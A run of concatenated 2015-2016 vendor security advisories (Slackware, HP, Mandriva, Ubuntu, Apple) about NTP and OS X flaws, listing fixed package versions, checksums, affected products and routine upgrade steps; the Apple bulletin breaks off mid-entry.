13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p2-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n570bb3e4bb7b065101fa4963e757d7e7 ntp-4.2.8p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ne6add42a70a66496be2d4978370c2799 ntp-4.2.8p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n99f1cfa5e23a256d840ed0a56b7f9400 ntp-4.2.8p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n0a6622196521e084d36cda13fc6da824 ntp-4.2.8p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n28cfe042c585cf036582ce5f0c2daadf ntp-4.2.8p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nc436da55cd2d113142410a9d982c5ac5 ntp-4.2.8p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\ncf69f8ecb5e4c1902dfb22d0f9685278 ntp-4.2.8p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n9c8344ec56d5d2335fd7370e2f9cf639 ntp-4.2.8p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n9dcf0eafa851ad018f8341c2fb9307b5 ntp-4.2.8p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0c063f4e46a72ec86012a46299a46df ntp-4.2.8p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n5f72de16e3bb6cd216e7694a49671cee n/ntp-4.2.8p2-i486-1.txz\n\nSlackware x86_64 -current package:\n1ba531770e4a2ae6e8e7116aaa26523e n/ntp-4.2.8p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p2-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04679309\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04679309\nVersion: 1\n\nHPSBUX03333 SSRT102029 rev.1 - HP-UX Running NTP, Remote Denial of Service\n(DoS), or Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-05-19\nLast Updated: 2015-05-19\n\nPotential Security Impact: Remote Denial of Service (DoS), or other\nvulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nNTP. These could be exploited remotely to create a Denial of Service (DoS),\nor other vulnerabilities. \n\nReferences:\n\nCVE-2015-1798 - Symmetric-Key feature allows MAC address spoofing (CWE-17)\nCVE-2015-1799 - Symmetric-Key feature allows denial of service (CWE-17)\nSSRT102029\nCERT-VU#852879\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.31 running NTP v4.x, specifically version C.4.2.6.5.0 or previous\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-1798 (AV:A/AC:H/Au:N/C:N/I:P/A:N) 1.8\nCVE-2015-1799 (AV:A/AC:M/Au:N/C:N/I:P/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following solution for HP-UX B.11.31. \n\nA new B.11.31 depot for HP-UX-NTP_C.4.2.6.6.0 is available here:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPUX-NTP\n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nMANUAL ACTIONS: Yes - Update\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.6.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 May 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niEYEARECAAYFAlVbxaIACgkQ4B86/C0qfVmiSgCg8hSMo6ue+WJXM0G6Cz7zSw+Z\nE7wAn1Y5Occ9WtyV0+W9iD/1QWizxwZN\n=Wku3\n-----END PGP SIGNATURE-----\n. \nComware 7 (CW7) Products - all versions prior to the fixed versions in the\nResolution section below. \n\n + **12500 (Comware 7) - Version: Fix in R7375**\n * HP Network Products\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JC072B HP 12500 Main Processing Unit\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n - JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit\n\n + **10500 (Comware 7) - Version: Fix in R7169P01**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA w/Comware v7 OS MPU\n\n + **12900 (Comware 7) - Version: Fix in R1137**\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n\n + **5900 (Comware 7) - Version: Fix in R2422P01**\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n - JG296A HP 5920AF-24XG Switch\n - JG555A HP 5920AF-24XG TAA Switch\n\n + **MSR1000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n\n + **MSR2000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n\n + **MSR3000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n\n + **MSR4000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n\n + **5800 (Comware 7) - Version: Fix in R7006P15**\n * HP Network Products\n - JC099A HP 5800-24G-PoE Switch\n - JC099B HP 5800-24G-PoE+ Switch\n - JC100A HP 5800-24G Switch\n - JC100B HP 5800-24G Switch\n - JC101A HP 5800-48G Switch with 2 Slots\n - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n - JC103A HP 5800-24G-SFP Switch\n - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n - JC104A HP 5800-48G-PoE Switch\n - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n - JC105A HP 5800-48G Switch\n - JC105B HP 5800-48G Switch with 1 Interface Slot\n - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n - JG255A HP 5800-24G TAA-compliant Switch\n - JG255B HP 5800-24G TAA-compliant Switch\n - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface\n - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface\n - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\n - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\n - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG225A HP 5800AF-48G Switch\n - JG225B HP 5800AF-48G Switch\n - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n - JG219A HP 5820AF-24XG Switch\n - JG219B HP 5820AF-24XG Switch\n - JC102A HP 5820-24XG-SFP+ Switch\n - JC102B HP 5820-24XG-SFP+ Switch\n\n + **VSR (Comware 7) - Version: Fix in E0321**\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n\n + **7900 (Comware 7) - Version: Fix in R2137**\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n\n + **5130 (Comware 7) - Version: Fix in R3109P05**\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n\n + **5700 (Comware 7) - Version: Fix in R2422P01**\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n\n + **5930 (Comware 7) - Version: Fix in R2422P01**\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n\nHISTORY\nVersion:1 (rev.1) - 8 March 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2015:202\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : ntp\n Date : April 10, 2015\n Affected: Business Server 1.0, Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple vulnerabilities has been found and corrected in ntp:\n \n The symmetric-key feature in the receive function in ntp_proto.c\n in ntpd in NTP before 4.2.8p2 requires a correct MAC only if the MAC\n field has a nonzero length, which makes it easier for man-in-the-middle\n attackers to spoof packets by omitting the MAC (CVE-2015-1798). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n b0f98e6b8700e3e3413582fe28d1ba06 mbs1/x86_64/ntp-4.2.6p5-8.4.mbs1.x86_64.rpm\n d864780718c95368bf9ec81643e35e5d mbs1/x86_64/ntp-client-4.2.6p5-8.4.mbs1.x86_64.rpm\n 6f457df52d46fb8e6b0fe44aead752eb mbs1/x86_64/ntp-doc-4.2.6p5-8.4.mbs1.x86_64.rpm \n b4bff3de733ea6d2839a77a9211ce02b mbs1/SRPMS/ntp-4.2.6p5-8.4.mbs1.src.rpm\n\n Mandriva Business Server 2/X86_64:\n e9ac2f3465bcc50199aef8a4d553927f mbs2/x86_64/ntp-4.2.6p5-16.3.mbs2.x86_64.rpm\n cf2970c3c56efbfa84f964532ad64544 mbs2/x86_64/ntp-client-4.2.6p5-16.3.mbs2.x86_64.rpm\n 1ae1b1d3c2e7bdea25c01c33652b6169 mbs2/x86_64/ntp-doc-4.2.6p5-16.3.mbs2.noarch.rpm \n d250433009fd187361bda6338dc5eede mbs2/SRPMS/ntp-4.2.6p5-16.3.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. ============================================================================\nUbuntu Security Notice USN-2567-1\nApril 13, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. A\nremote attacker could possibly use this issue to bypass authentication and\nspoof packets. (CVE-2015-1799)\n\nJuergen Perlinger discovered that NTP incorrectly generated MD5 keys on\nbig-endian platforms. This issue could either cause ntp-keygen to hang, or\ncould result in non-random keys. (CVE number pending)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.3\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.3\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.4\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2567-1\n CVE-2015-1798, CVE-2015-1799\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.3\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.3\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.4\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update\n2015-005\n\nOS X Yosemite v10.10.4 and Security Update 2015-005 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A process may gain admin privileges without proper\nauthentication\nDescription: An issue existed when checking XPC entitlements. This\nissue was addressed through improved entitlement checking. \nCVE-ID\nCVE-2015-3671 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A non-admin user may obtain admin rights\nDescription: An issue existed in the handling of user\nauthentication. This issue was addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3672 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may abuse Directory Utility to gain root\nprivileges\nDescription: Directory Utility was able to be moved and modified to\nachieve code execution within an entitled process. This issue was\naddressed by limiting the disk location that writeconfig clients may\nbe executed from. \nCVE-ID\nCVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec\n\nafpserver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in the AFP server. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3674 : Dean Jerkovich of NCC Group\n\napache\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may be able to access directories that are\nprotected with HTTP authentication without knowing the correct\ncredentials\nDescription: The default Apache configuration did not include\nmod_hfs_apple. If Apache was manually enabled and the configuration\nwas not changed, some files that should not be accessible might have\nbeen accessible using a specially crafted URL. This issue was\naddressed by enabling mod_hfs_apple. \nCVE-ID\nCVE-2015-3675 : Apple\n\napache\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities exist in PHP, the most serious of\nwhich may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.24 and 5.4.40. These were addressed by updating PHP to\nversions 5.5.24 and 5.4.40. \nCVE-ID\nCVE-2015-0235\nCVE-2015-0273\n\nAppleGraphicsControl\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in AppleGraphicsControl which could\nhave led to the disclosure of kernel memory layout. This issue was\naddressed through improved bounds checking. \nCVE-ID\nCVE-2015-3676 : Chen Liang of KEEN Team\n\nAppleFSCompression\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in LZVN compression that could have\nled to the disclosure of kernel memory content. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3677 : an anonymous researcher working with HP\u0027s Zero Day\nInitiative\n\nAppleThunderboltEDMService\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the handling of\ncertain Thunderbolt commands from local processes. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3678 : Apple\n\nATS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in handling\nof certain fonts. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-3679 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3680 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3682 : Nuode Wei\n\nBluetooth\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the Bluetooth HCI\ninterface. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may be able\nto intercept network traffic\nDescription: An intermediate certificate was incorrectly issued by\nthe certificate authority CNNIC. This issue was addressed through the\naddition of a mechanism to trust only a subset of certificates issued\nprior to the mis-issuance of the intermediate. Further details are\navailable at https://support.apple.com/en-us/HT204938\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork HTTPAuthentication\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Following a maliciously crafted URL may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in handling of\ncertain URL credentials. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3684 : Apple\n\nCoreText\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted text file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nprocessing of text files. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1157\nCVE-2015-3685 : Apple\nCVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3689 : Apple\n\ncoreTLS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: coreTLS accepted short ephemeral Diffie-Hellman (DH)\nkeys, as used in export-strength ephemeral DH cipher suites. This\nissue, also known as Logjam, allowed an attacker with a privileged\nnetwork position to downgrade security to 512-bit DH if the server\nsupported an export-strength ephemeral DH cipher suite. The issue was\naddressed by increasing the default minimum size allowed for DH\nephemeral keys to 768 bits. \nCVE-ID\nCVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck\n\nDiskImages\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An information disclosure issue existed in the\nprocessing of disk images. This issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2015-3690 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nDisplay Drivers\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An issue existed in the Monitor Control Command Set\nkernel extension by which a userland process could control the value\nof a function pointer within the kernel. The issue was addressed by\nremoving the affected interface. \nCVE-ID\nCVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application with root privileges may be able to\nmodify EFI flash memory\nDescription: An insufficient locking issue existed with EFI flash\nwhen resuming from sleep states. This issue was addressed through\nimproved locking. \nCVE-ID\nCVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah\nand Corey Kallenberg of LegbaCore LLC, Pedro Vilaca\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may induce memory corruption to\nescalate privileges\nDescription: A disturbance error, also known as Rowhammer, exists\nwith some DDR3 RAM that could have led to memory corruption. This\nissue was mitigated by increasing memory refresh rates. \nCVE-ID\nCVE-2015-3693 : Mark 